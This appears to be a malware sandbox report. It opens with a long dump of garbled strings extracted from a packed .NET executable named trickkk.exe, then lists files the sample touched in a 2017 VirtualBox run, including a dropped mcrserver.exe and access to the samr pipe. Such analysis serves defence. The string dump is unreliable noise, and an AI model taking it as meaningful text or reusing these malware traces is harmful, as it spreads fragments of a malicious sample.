>Y|L
a[Zk
<S+
p?pr
e}b\,
UD@1(
I4i8
JW~<E|
UGl^
?uh
|fD(
G J @
pt7GP`
y.6},`h`K
=ewo
+6
bWby
MA&!b
n;uB
w#Qu
B"3FFW
6n?
0A?\
.@ZNNNNl
0t*Q
;&tm#N
B2[4
//5.@O
M a{p F
IB[{
44 ^0
\$=W
6mSk
si.i
70{R
H2\x
<Q<#
Sq?n
Microsoft
N z
####
P m
u85O\<x
\= \Gt8]"RG1
0PUM
M1l9
EG73
F ;`
_B&J
x0,)
XL5j
uEMK
zp#%e
P%X<
advapi32.dll
3)v%
2@ p
T v?jsaI8
BpuAt G
hbcpx8
^l?9
"R~N
Gwf0
{`})t
ZX`
7 d
_JV)
2{t
W, U Z
;p0tG
TV_XU
-#VL
___________
B(!.
v'1
1~GhCC
+A4.
/`^`9
o2xuj
WQWQWQi
H9 Ymng?&
R@@t:
h+8M
1t#.
~{TL
|>>Bq
| DN
>$rgHba~
`)%'
`eX
Ad\X
vm) n
od.V
0W<
-xz"
Mf3L
~5{~
4A+
Hu[U
"js@
d e
ghiIkOB
mC{L
+,
T'wX
icA
H B
KuD
(vBBO
<jB`y/
5kO,zxO
u@hu
ad
2pbG
,A{# '
=|$<Ge
jh
l:$D~+m
ge/]
!5DU)u
B^al
@B&/
!n [;I
0"TM2
hhDA
cn_F
EJ }H
\R9Z
c$+@
2);7
@ g
ySl@a -
ZX =
SKt
B+i!
X8T>
rrrr|xtprrrrlh`\rrrrXPLHrrrrD@<0rrrr,($ rrrr
````
2^?C_4
B.?`IM
.rsrc
xnm(
o1M<
L!VZ
\HY xTb
ix 4z
t@f
:F -
$nm!
Z rdF
XKY{L
i/i(rH
[`*!7
vCd.`E
u b#
NNNN,6FNNNNNZdv~NNNN
h) 4=
?L_WOF
``*n1
61G>O
khlM
XCD[tAx
t%4G
0?zso'F
*8`C
1P@6
P#a}G`
,s<trdl
s4Et
<8 2<xG
Oi3l
CXS$
`"5
ala*
HPX`h
RF##e
6X4IH
jho =
_ , $w
4%&8
o7_<U
V^I+Q
<@ptDmE=OxHL
o
&yz!
yP^~/5z ={
`N z
sqZkL FNN
sfS
NX2
pt .
8>lE
<R![7
9X4u
/d(H2
_.]
_cxx*_
lb5z
-f4Be
9lp\
+2~
T L
Mp_BYTj
}DyqyQvSF
X+ !
^.fe
vCC>,'
Crx|
',!d
$rBm
AlU)
(O5 A
|UTV-
#'TH
0`zh|
4$xH
t f P
v3(T
:/rv
L:2_|
M6gn
':AX
um(R~M
S8sH
')<\
Ps|9
1*G$
oh,
CLKTDO
u.
H~ _
'H'
xH =
& 9r
P96S8
XV6
iqpp!EPe
[-R-O
L}I^
~tkFwN
liKV65Y
Q 6
G&Go
+0!>S
IGGGGG
?`^g`
\ 8
NrnWH9
0,Cd
6LLP
1:`t
MoveNext
Dispose
XwX8
.Ww[[|U
EFF\L`
\HDE|r
w<##
w%,d
~Gwa
Zu}T5#J
!pot
6 Vu
pT`8
d*
@Fx9
_n-bP
= f?
l1#xo
OW',u
Tl$lp$8W_
____________
i`\-!
WrX+ ~
9T`
=&i<
nPEWn
7U7`N
#6wS?
d`d`d
TOh
M2>L
hZ: BptE
4`pG
oA^pO
GetCurrentProcess
192t
rtxx|
+../m
Ct2<Dw9
%'(u
~>Cd:
7qGZ
_WOG
~\ B/A
)?Rm
C8<8p
get_Item
-dHXu
P -@b
45~
Ldce
5|1"<"`
YIjc
1;u
iaYQIA
G~P-
<,G+L
PU0`i<
< `0
-}Bj
,1cDR
B OJ
R8v0oJ!h
NS<u
p?r!S2D
l> M
7 FC
S@s@G|$
NXWD
l wO
lF sKX
hXHw
!##FF
x'a
LxLDB
dZ)p
jA^;
la=j
vv)Q
!u3
O q.
)zR_
-}9j
\pipe}>[OR
XmB+
HFtz
&mB
N?8h
$ 1:
j1t
WindowsBuiltInRole
(TT? a
< $`d,`
o()_0
qaSu^L
wSi -]
& u=
u,y'{') S<
0z47
X`%<
rrrr&>Xhrrrr
ge}k
}4rB
\DOYQ
s |&p
Q!CI ,
V]V4
$ dV
.t_ #u
XAa4
eNFi!=
`05Hv
k_pF
.}fa
{Dq?
Ux ln
p Sm
L\ZvO
3No f
P ] `eaN
tz1-_Y
}h{q
ZXf
>RS
xF'(C>t
xX+ ~
w6,'\
X~|L
ty1J
qA<F
od,c
.)tu
M/TI
Uy0&oKR
ToDosE
C@Fa
4A~
'RAW_i
t8E BH
a^fI
%pd,
zyA.#o
#|]l
|4t
7 .u
tv6
wg o
@n@{t
@1Bop
*,,c
x; \pwV
?18 <
ozG S0
S(I_
ZXf_
} ^0
h{-l
&ztE
*::&B*
]4*
88\I
|IV0
x9M
O(s"
s($
X8wkH
>v@u
m:A
<Dc#LF
_DJ.
~j
u ZZ"G
H#lh
'7RD
X L%
F0XX\
|( X
UPX!
=A I
`:X[@
;oGC
6stM`k
rl wL
}+x s
J:|/
4x8Z
x9
sh .
UPX! $
JuO/$
G@mZp
OT"+
}himqqu
xpu
CYX- d
[)wOq
uhvfv///O
r.$i
@lc&
!{sd3;`{
-(2h
e u"
& |e`,
&(*/
5~gS
Et2Q
%o`&tT
cJYu
<Thy
l@k@'F
McTa
!8^3Z(
l H
olAsH
Hp!Q~
K,\C
ww>1I
-$>>
g?<QAu
8=<o
D T
b7F0
/(+
GFF@|
Uzpup%%!"%jr
<eFH
fQZ
c$zif
=INGN
<Module>
#^ #UT
yt`,
xO%U
U@;5S
$\(H
`MzX
AGv9"_
,1l,
%yV
m& >
@ CG
|5<F
~
hv}hi
)*jc
K)~=
h;[p3lWt3p
Z{nB8
f7d.
^g%
+H+C
d[r[
@ta;^4R4u
F#]s
` dsy
8=v{
j(4C
lWhZ
t/cD
7<pZ
__register_fr/
MD5CryptoServiceProvider
o%dd
zn3h
|@NH
SrJjz
dYt;
9?S$>
4044
fCM0)X\dD
<Dh `
Q+PLA
f://
T 7@
Ttx5,
b!_K
#Rq
dCo_ySt
$B12Q
<CX
+2 P
PgDl
S@OD
j<Q
+ Mt
>FNL_
8zO"6nM@
%>6
cYvqadl
rF[Ch
B)-6I#
(( q
ica8
5&??
[OVss+
8EAF
>U~
Z6f{
+ U/
mJ_LJKN
TotK
J}<U
?D
\(&dB
X( I
uZ4|
Cw!m
:S.6
--#% ,
LdH`
CT|$T
aUOC
[6u*p
hGxC
vfVF
[ ?0
Of'J
ox4
S+9d:
8\<#
qu\_
l{8b
TkBz
c<WP
?ru"
%;CH
"6` \
sTg;
.}X0
ZX >
LZ(~X
v[84d
BX&~
`'qg
E |Fn
Wr%S
k]0p
rl w
>~H/
0 tld
y7Bi
X4L^
_=Z\
w__# 1d3
<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"> <security> <requestedPrivileges> <requestedExecutionLevel level="asInvoker"/> </requestedPrivileges> </security> </trustInfo> <compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"> <application> <!--The ID below indicates application support for Windows Vista --> <supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/> <!--The ID below indicates application support for Windows 7 --> <supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/> <!--The ID below indicates application support for Windows 8 --> <supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/> <!--The ID below indicates application support for Windows 8.1 --> <supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/> <!--The ID below indicates application support for Windows 10 --> <supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/> </application> </compatibility> </assembly>
5x)ddd
LOAB
p+Hc
7JP.K(
Y?Q&W
?S0x
^QU<
l3+v
Hi@$
K|,K1
P ?r
=?L 0
;$n,I
EL%h
G O
j]os
~0`O
`(SW
ZJBZ
x}oh4G
l1hV
JHlw
_$t&
!`I%I/,
bU8x)
rOjeONac
&<c]%c
<@>
MJ,A
r!<()
`_aE1
GCE=
ct+:
op_Equality
NNNN
[Q
Py `
|@7`0
j}-X
4x#MB
] O
^;7u*
Ws;P
4TtP8
@ )8
]=eT
w ik*H
JXLL
.@)u
Oak,S
G> |
P(X0
hvE/
] zi
c!n>!!"`#' +6#<`-!#tzzzznc;n
] W-1
Q L
fZwS
;|$v
9@z
@)a1L$/U
s8 7
Z;\F
-Y.b2
,VRy
gZ[(08
'\&`z
TE[W[mk}za|qWKmf|mzT
-}@j
;"s R
w2[E-58
@w'_
hut-
KgLZ7
Dg}G1<~
;qf[7
=S:;
`fQ
1H8ve
giF-#X
\w^E,
d4^/
9Q }
)h#43
SI"
<Xu<V 2
DBWku
Z"R`
M^k/
1w-zc
V():
,nzb
LR^GWy
E0 D~
,l
h?,?4
zQu =
7$Sc`vU?
HashAlgorithm
0Ff4
'\$?fY
"\@H
@DDt
K^<l
7nt8 _I
<4dh8l
$mC
V#a:c:
MAX_EN
y$!
fgvT^W
Cn77Y
:Z
"C[
+_~0
<5[w
q_t#<n
,Pl]
.-Ze
:IcT
t}oF^
< 0D8Wk
wptS
%o&
{7_\
+ L
#L0O
w30/0w3
B+2jR
+ D
Md18
u)5 ?
+ Y
+ Z
+ ]
iq|5
BSJB
i,?p
eY eL
7A $
/conn
pn,o
3{&i
k* l32
nfSq
:TvL;
l*Vc
Ny~o0i
% w
+ s
T<*_uMV
+
== 0!]q
4;M+
xIv
y*P0
pW+B }
0*)?m
(%d)
( 3BDK
'8@m
9K8v
/k`m
6XTJ
;1.^X
{IGAL
l+N|
+j!W
SDd
oMxW
+ 7
/X+ ~
,zZf
8`U`
uQ8>"g
!Q\+)t
Tm(@
,(7J
l4X<
8]#V^^
$8nbMw
~OXDtp
Xs.1
Ajb#
-KO+
DVyW
pq|c
<I6{
D0j`
Py6B
T@"kS
PUS8
[LLQL
L cb
Qe<m
>: /
./dy
\U4[
E )z
t7vJ
N!FVB
-},j
_@& o
su6&
T>Gr9<
]RU
A4[4
p r'
I>{{"7-
,FZr
Z{9^
|CD;`
b41`
LnH5
)2Ar
I{XP
Gp#p{
?wcp
r7]x
s9I34E
x#(
1X+
]_QJ
<bt0
;[JC
.$7}
Int32
Q#-'s
+ ~
H;nv
f<scab
a~ +
`tVuA*/
5x6X
/2288
=8xE
!(ify
D1 26ddd
Aic]
q1X+a
R<ea
)QZ
qo(
vpNZL^
w]l
syZN
Xcxm`Dimh
eI<X+ ~
J M\c
! F+z
T"9 s
/EF%
i}T1qn
"!WJB
SPC~)
ID T
_XPD*
)F H
P,@S2
H/jT
;hlp
BX-@n
^ 322n
RM3INT1"%s" nJ
JSXwu D&
<ue;\\
PUkZ
o 0[
nbB0
"<I
JOBI
@U29
6 %
:EL;-
4V;E
!@CLeIg6
L_Vp
E~r=[
.i6 $^
uJlUh
LLM,
9.0.2.774
QO`j
fh^
j_0m.
Cc^|
<_^N
WriteAllBytes
xs +
,Oi5
Rh!xt
+k(m
k0 p<`!
}7!X@
VFFo
EB_
3A 3l
2$C2
tHzX
%f,u
a])V:6
_"IN
C^Ntry
(3\*
V7e
TN'u
&duE
?@.89
hI$<|IYy
&duP
D# p
? '
nAO8
A2 B
p$~.d
JGAb
S2.5s
3w ;J
b&34'!
<H8(
6+>'
~%9~
crC(
//'E4 4
0:D+
$Owpe
i4tNGt
=|oc
=5{Pb3
9_cQ
tB@<
?,/&>F
}X+:
YjXFlg
"" 0s
hSf}
Y Ied
lH>[
|eX<
A/J&u
"5@8
"3_:x@;
4OLKTDSC<O
J3Q/((
!F /e
\t*!F
Fc%Dm*
822|\x
> mu"
h"[O
Y(2.\P
>zLp}
lp/|L_0L_
3W:_
NDLE_CLO"
i.LY
(7x|
H$5O
cMD X
ClFp
Z0
4G(
t`^D
<ne$B
a?RV`
ToDosEeL
GJB{@MDD
) gv
]>"1
,Eb0?c
4rnj
Hrw^.c
x>
u{[ke
0;u u
;g: r
0}]d
_ln\Z
c6[
ryptx.ht
k Xl
,n66
;bps
r!<
S/7(
vTnl#K
ZY V
!6&
? !$
xT,7H%l
9/u"
JAAE
'p%#
G`a$
&'' F
xiWd
E;d
yS0h
I?* >
0R1K(
>Mt`"F,
*2t\
E S^IZ
KPD;
4KQC
Gb@6lO
-}5j
C.
ann[
8pu_
#q,f
__________
:c:khB
090w
L>h,
5;6Q
-]FJ=f
+-!H
String
X*y?
Nn 6sb
$+<"
EX d
p HC
!u 2
*O)8
F49C0sG
z03i
s}P?
"!Z<2X
jWg2
t*(>
iCQ?(#2
N;Jm?
k<VL
r(um+tcp
xkIv
FV 9
`GKH
wq_7 _4$
}]_c><
T. ?oo
( n7
QP;w
EditorBrowsableAttribute
ot+
V[Xk
,. O
:Si'it':'
_b8L
xm|2&
v <B
JA(8|s
w;p
Z 6
<X+
!@fS
Tls3
86~ d
r D9
dDSO
f v8\
n->O(Ct|7,o
,{hM"
PMAr
.3i/
A( 5d
LXptJ
lop e
CurrentUser
0`m3
yBETL
6T<_
/0tb
TtI_Vt
#G(8
<RtH$
!c #`C
C2"#
Lk@\
N v
xiUL!
CfIl
G]-B/cA
F|*>6
iX+ ~
=Ayy
(+sw
OV32Sn4s6
P7!.
ryOsn
=8d$G
:`dn
i$*qk#
(LGth
;4sJw
@7`B
`N6!v
v <BN
O0`p
|&|O
9rBI
\;x
X+ _v
E+a. IHg
EU(^
+|77R
t5u=v
% J%K
0!6k
-QOB,
?6 F
djzv
(H
\ \ \
D)F
>Ho;B
=Y+ !
5&r4g,
Object
/N(W
1.
U9 -
c8 @
v2B(
@nP5
cw/X
=R %
7k X
lpG
C dx
|LNk
o`Z3
2f/X
0!I\
u<Mj2
HcLF!7
L$ M
%53551 e##
H$$l
=n <A
?x& %
z\q
ginputbexp
aR!W
CaWe
vWM9
J" s
b\<8=Xu8
Syj
C+y<
p1 +#P1
p.kZ
rE(
pZF p
msg_1b
G5]
+%lV{
t mM4
- ~
O6Bt
M,7L
TfzS
("w"&|
L|LG
+"w
tN
Nc(5W
97&'1&"1&z1,16R
FXr
N y
aXA<m
~?
0Po8py
w)[J
iq2v
8*uw6
\ -
#KLG
*qE<
THREADS:
Bhcm+
[ox
vXwHA
Fb_'
g -%
ZX E
Exit
CompilationRelaxationsAttribute
k?.
{zT*D
r g4
MT.<f`
`~@ i
y`i@k
}M9p
;Z;E
Ik7@
9GMq
#Mz5
WDtpC
b ,u4.F;
BNZy
yH3
Contains
L@uH
XRTC
w')K^U
DnXm
5mJE
qzDCIBZ^q~T^YH@
ZXa
1?.=FBqf
#3s|
PT[]
\.zpG1
WSI
Q6D
-}.j
:\t
%Ku>
$Hvq,-@]~lz]p~m{L
D: }
] -
aXI
@H.3oW
Q,;p
D#&_
.InOx&
x:ima}
C"
tHtp
T (A
(8of
}DSC)
A<@ }
u{.<
@`tx
f,(r
xTa~
hKTK\ ah
iJ[(\
K '#
System.Threading
`.co$
DebuggingModes
W|Vo=H
V|&JM
-8 G
m+p
D+lX
'|b *
(jRu
BQ&R;F
8?}
2.5s/60
I*p|
[(4q
d4 b
cx%k
^!0v
ga&0
OS05x
\\ @c
HtFB
q bw
BS _|
z&@X
`l#H
9@~`
(tL'
X1 <J[l<
ht#0
;TLSn`
X A
get_Current
nE0x
pg}vYU]E
Zff
tRf$
11 2
VU$
:(lbrf
+ <>n
C&5=
J ;k1C
8 uItM
j!
8$YP
&+%!n
rgetos
v4L@
oIt>3
3%4LT
2'@
^N>.F
B|--,
>z /
y B#
l M+
?x_$
_e_3
yor$
~wp!
tz*1i_HS[VtOWX_H
,0Kb
-r,8
nb|!
@T z
^#v8
<O!UG
jVhF iL
4A/:1
e2H^
!eo;
_e_k
AceQualifier
,/dBN
VE)a
t 8y
(%g, g)
hp Y -
)x0
t; /
t,<mt(
8YqE/R
1mEdA
CuG2^?4
\.'H
-U ^
Y2V6
K/5C;
i_f*
ap%#
ZX6Cl
-{j$
|A6
b)~Hi
~ghYm
PLGX
&)0Z
hN`K
(VO%v
G2tW
yo]y
?0tj
}1F
IsDBCSL
1 F+
GetTypeFromHandle
7lpeY!
++EH
3A8\
uv^G
x_05
B $
t4ug
3j ^j
Lu\&
Int16
)A O
7DE]-
\$4t
FFFF
e <<<
g"#q<
KHtX
,,N0X~
~#y%
i R&B
}!8l9
[BKa`
=K0I
]h/0
jLk"|
UD*IE
@-\3_c
do-'
U#BI5
'/)"
GtBp
82r\g
X[ Liy?
SPiRL
Nd2$
+O kq
HO>
3t`{:
C,$$
/f+8
\=\t
N'v#2
6r;-
\*!B
I9Vg52
System.Runtime.InteropServices
6(}S"2
>8|y
Kb/ y
C__C
_ 6
3;lz
4vHW
*I%o
rIgX
sMC@
a&qB
JQAA
rt \s
8fcYD
\yz{
xX+
jP##A
System.Runtime.CompilerServices
*u{s
9 5?hT
`] WW
l_p=
z-iA
{IMM
xd f
4NBr
0^t.
~||4''
:rjA
<ilt
ltsdt
7]cd
w\%'
*{_8
,! Ja
X K L
i @x
{"j"Bll
l$*R+<
l<<<
_:Qr
QfOH
G=ALGO
#Zl{`heG|dkl{
C1Dp
LyMk[
K[?q6(\
623456789;G>
mV0o^4
`\. pW
`(,&
\:l
9.fewa
e,JO
9{ v
N 0L
TI O
lN 0
G$a\
HE&Z
q60J
`\XT
"$D: LB D
poIO
Z@J>
3wA ?Y
Q`0
u =tHC
xZpP
j",
%84,P
MT ]
O\4]
s}e?%n
~.v`aA-'
_________________
Q2v[
YyA@
L:GP
KLa1
G@j2i
Pn'd8Y{Z
~Sx3 >
4m~Y
Hc H
YGi;a}
L^ r :X
Dv D
{dMu
_Q U
AM@F{
ZX`a
ytX\
Fp=
8[HT5
^- L
$*u`
madIXD018
iG=_\
|:;`
NFoi/g
>59$
vG
vH
22B|
?,{)
n#9V
1t=g
v>`M
________________
|Oh
y-!N
8Chl
PvBm
8>t!W
Bh%d@
$ hO
TPu2
9`da
&Fre
&~+
NAoD0&
ProcessWindowStyle
?5aY
|SD,
| `
=ftn
)p1u
12^6
/~;XTK
d=Ox
ax-Yu
^o{0`W
[< n
BYI7
fd}-1
=tjM|
(OWHF
0H 05 0
!)tu
p>_=w[2PGq
0 z (X
Z*X
)pD
"$RP
w F6
CwvJ
snL}E
{5F(
HhD
%{pX
R- ,
6Y0.y8^@
"rrrr:P\l
Cl`hx
J{(E
yAhPVp
;Ka3
l6<%
3n@'<
w}# x
z+hmD
PUC`B
8Y7E
0pVI
~LdS
POOL #1%
K;w(wF
&1H<
cIK{
Rg{kX
X[`j`
)''T
B.vA
|?&L
I7,)
!3_^
QI+
Encoding
'u-TW
9hSlE D
gr`6
s&E]
4+T%
Fp%y
TwJ3
$u@R
bCSJ
=%)p?
YX+
Cs?3
"U'?,
(U h
07- 4
tCdnnn
198 etFF7
8o$@
Q+E/oL%
~o~Z
nX+
f5 :6
Parse
q%rP
"P>u
_n#L
`9nX
L``@2
uAGn
s;J?
mELX
( t
C58h
` !
~F?7
.eK9K\9.
J!;t
MM 4
b}At"
&qJ<
ManagementObjectCollection
wC /R
=FtQ|c=G
V2>
cn#9< TX
+0f0:4
&[7
<L(T
+eJd
~I=,
33RZ
eTeKRf*
QA7M
GXK+:
ZRXL
hXPd
;Bu2
e' G
H&bCm
?avY
3u#
00*9N
Stx
[0].W1
QH)QH
yoh
K;F>mS
.=O
>oLV
[RyY
x[/6L s39
System.Collections.Generic
z.rE
} R
/0N
LlK\
L@TH
[girZ
N<B.
ptp 9
5H$aQ
26G1 2
i8yP}
{Z(K)j[A
W&!&8C
8Ms{r
G@1&
,!W`W8
txHrH
bZ`
i:AX
)^Y9 ,V
s,s!
SSBR
98~O#
H&B?)
AssemblyConfigurationAttribute
IhFw-
>H( <
"SD_
5]1
@Bm,(H
Og\F
<D7 :
I;mpL
S j@ D.%
^ k.
h'p`
0I@k
MC[H
JU`)
zb/:;
r, s#
c<{A
Behavior analysis details
Machine name Machine label Machine manager Started Ended Duration
Seven01_64 Seven01_64 VirtualBox 2017-10-23 13:45:53 2017-10-23 13:48:48 175

19 Behaviors detected by system signatures

Behavior analysis details
Machine name Machine label Machine manager Started Ended Duration
Seven01_64 Seven01_64 VirtualBox 2017-10-23 13:45:53 2017-10-23 13:48:48 175

11 Summary items with data

Files

C:\Windows\sysnative\MSCOREE.DLL.local
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll
C:\Windows\Microsoft.NET\Framework64\*
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\clr.dll
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorwks.dll
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\clr.dll
C:\Users\Seven01\AppData\Local\Temp\trickkk.exe.config
C:\Users\Seven01\AppData\Local\Temp\trickkk.exe
C:\Users\Seven01\AppData\Local\Temp\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\sysnative\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\system\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\ProgramData\Oracle\Java\javapath\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\sysnative\wbem\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\sysnative\WindowsPowerShell\v1.0\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\unrar\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Python27\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Users\Seven01\AppData\Local\Temp\trickkk.exe.Local\
C:\Windows\winsxs\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6229_none_88dcc0bf2fb1b808
C:\Windows\winsxs\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6229_none_88dcc0bf2fb1b808\msvcr80.dll
C:\Windows
C:\Windows\winsxs
C:\Windows\Microsoft.NET\Framework64\v4.0.30319
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\machine.config
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\fusion.localgac
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\security.config
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\security.config.cch
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\enterprisesec.config
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\enterprisesec.config.cch
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\64bit\security.config
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\64bit\security.config.cch
C:\Windows\assembly\NativeImages_v2.0.50727_64\index148.dat
C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\9469491f37d9c35b596968b206615309\mscorlib.ni.dll
C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.INI
C:\Users
C:\Users\Seven01
C:\Users\Seven01\AppData
C:\Users\Seven01\AppData\Local
C:\Users\Seven01\AppData\Local\Temp
C:\Windows\sysnative\l_intl.nls
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ole32.dll
\Device\KsecDD
C:\Users\Seven01\AppData\Local\Temp\trickkk.INI
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorjit.dll
C:\Windows\assembly\pubpol21.dat
C:\Windows\assembly\GAC\PublisherPolicy.tme
C:\Windows\assembly\NativeImages_v2.0.50727_64\System\adff7dd9fe8e541775c46b6363401b22\System.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Drawing\5910828a337dbe848dc90c7ae0a7dee2\System.Drawing.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Windows.Forms\6c352ff9e3603b0e69d969ff7e7632f5\System.Windows.Forms.ni.dll
C:\Windows\assembly\GAC_MSIL\System.Windows.Forms\2.0.0.0__b77a5c561934e089\System.Windows.Forms.INI
C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.INI
C:\Windows\assembly\GAC_MSIL\System.Drawing\2.0.0.0__b03f5f7f11d50a3a\System.Drawing.INI
C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Management\c44929bde355680c886f8a52f5e22b81\System.Management.ni.dll
C:\Windows\assembly\GAC_MSIL\System.Management\2.0.0.0__b03f5f7f11d50a3a\System.Management.INI
C:\Windows\Globalization\it-it.nlp
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\wminet_utils.dll
C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\oleaut32.dll
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\OLEAUT32.dll
C:\Windows\Globalization\en-us.nlp
C:\Windows\assembly\GAC_64\mscorlib.resources\2.0.0.0_it-IT_b77a5c561934e089
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it-IT_b77a5c561934e089
C:\Windows\assembly\GAC\mscorlib.resources\2.0.0.0_it-IT_b77a5c561934e089
C:\Users\Seven01\AppData\Local\Temp\it-IT\mscorlib.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it-IT\mscorlib.resources\mscorlib.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it-IT\mscorlib.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it-IT\mscorlib.resources\mscorlib.resources.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Culture.dll
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\it-IT\mscorrc.dll
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\it-IT\mscorrc.dll.DLL
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\it\mscorrc.dll
C:\Windows\Globalization\it.nlp
C:\Windows\assembly\GAC_64\mscorlib.resources\2.0.0.0_it_b77a5c561934e089
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089\mscorlib.resources.dll
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089\mscorlib.resources.INI
C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\bcrypt.dll
C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Configuration\091b931d0f6408001747dbbbb05dbe66\System.Configuration.ni.dll
C:\Windows\assembly\GAC_MSIL\System.Configuration\2.0.0.0__b03f5f7f11d50a3a\System.Configuration.INI
C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Xml\ee795155543768ea67eecddc686a1e9e\System.Xml.ni.dll
C:\Windows\assembly\GAC_MSIL\System.Xml\2.0.0.0__b77a5c561934e089\System.Xml.INI
C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\rasapi32.dll
C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\ws2_32.dll
C:\Windows\Globalization\en.nlp
C:\Windows\sysnative\tzres.dll
C:\Windows\sysnative\it-IT\KERNELBASE.dll.mui
C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\winhttp.dll
C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\iphlpapi.dll
C:\Users\Seven01\AppData\Roaming\mcrserver.exe
C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\shell32.dll
\??\MountPointManager
C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\ntdll.dll
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\security.config.cch.2092.10866375
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\enterprisesec.config.cch.2092.10866375
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\64bit\security.config.cch.2092.10866437
C:\Windows\sysnative\wbem\WmiPrvSE.exe
\??\PIPE\samr
C:\DosDevices\pipe\
C:\Windows\sysnative\wbem\repository
C:\Windows\sysnative\wbem\Logs
C:\Windows\sysnative\wbem\AutoRecover
C:\Windows\sysnative\wbem\MOF
C:\Windows\sysnative\wbem\repository\INDEX.BTR
C:\Windows\sysnative\wbem\repository\WRITABLE.TST
C:\Windows\sysnative\wbem\repository\MAPPING1.MAP
C:\Windows\sysnative\wbem\repository\MAPPING2.MAP
C:\Windows\sysnative\wbem\repository\MAPPING3.MAP
C:\Windows\sysnative\wbem\repository\OBJECTS.DATA
C:\Windows\sysnative\wbem\repository\WBEM9xUpgd.dat
\??\pipe\PIPE_EVENTROOT\CIMV2PROVIDERSUBSYSTEM
\??\pipe\PIPE_EVENTROOT\CIMV2WMI SELF-INSTRUMENTATION EVENT PROVIDER
C:\Windows\Globalization\Sorting\sortdefault.nls
\??\WMIDataDevice
\??\ide#diskvbox_harddisk___________________________1.0_____#5&33d1638a&0&0.0.0#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
C:\
\??\{71F897D7-EB7C-4D8D-89DB-AC80D9DD2270}
\??\{29898C9D-B0A4-4FEF-BDB6-57A562022CEE}
\??\{E43D242B-9EAB-4626-A952-46649FBB939A}
\??\{DF4A9D2C-8742-4EB1-8703-D395C4183F33}
\??\{8E301A52-AFFA-4F49-B9CA-C79096A1A056}
\??\{9A399D81-2EAD-4F23-BCDD-637FC13DCD51}
\??\{5BF54C7E-91DA-457D-80BF-333677D7E316}
\??\{C2D43895-0262-4873-A789-C2F96D24B693}
\??\{2CAA64ED-BAA3-4473-B637-DEC65A14C8AA}
